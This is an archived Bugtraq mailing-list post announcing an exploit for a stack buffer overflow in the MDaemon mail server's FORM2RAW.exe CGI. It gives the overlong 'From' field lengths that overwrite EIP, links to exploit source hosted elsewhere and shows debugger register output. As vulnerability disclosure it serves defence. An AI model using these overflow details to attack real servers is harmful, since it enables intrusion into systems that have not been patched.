[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Rosiello Security's exploit for MDaemon
From:       Angelo Rosiello <angelo.rosiello () katamail ! com>
Date:       2004-03-14 19:38:09
Message-ID: 20040314193809.6627.qmail () www ! securityfocus ! com
[Download RAW message or body]




                            © Rosiello Security

                          http://www.rosiello.org


Bug found by hat-squad security. 
Background by securiteam.com

MDaemon offers a full range of mail server functionality. MDaemon protects your users \
from spam and viruses, provides full security, includes seamless web access to your \
email via WorldClient, remote administration, and much more!".FORM2RAW.exe is a CGI \
that allows users to send emails using the MDaemon via a web page. It processes the \
fields of an HTML form and creates a raw message file in the raw queue directory of \
MDaemon mail server. This file then will be processed and queued for delivery by \
MDaemon. An attacker can cause a buffer overflow in MDaemon by issuing a malformed \
CGI request to FORM2RAW.exe.

According to the Help file "By default, MDaemon 6.52 or higher will not send emails \
created by Form2Raw unless the email address passed in the 'from' tag (see below) is \
a valid account on the MDaemon server. If you want to disable this behavior you can \
set the FromCheck=No in FORM2RAW.INI file". 

Sending more than 153 bytes in the "From" field to FROM2Raw.exe creates a raw file \
that when processed by MDaemon will cause a Stack buffer overflow. The EIP register \
will be overwritten when the From field length is 249 bytes 


ADVISORY: http://www.rosiello.org/en/read_bugs.php?17
EXPLOIT: http://www.rosiello.org/archivio/mdaemon-exploit.c

The exploit has only been tested on Windows XP Home and pro edition (dutch) sp1. 
The demo mode of the exploit shows in the debugger the following
EAX = 00000000 EBX = 00000000 ECX = 014D1BD8 
EDX = 01090000 ESI = 014C6000 EDI = 01AEF1A8
EIP = 42424242 ESP = 01AEEEE8 EBP = 0005E668 


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic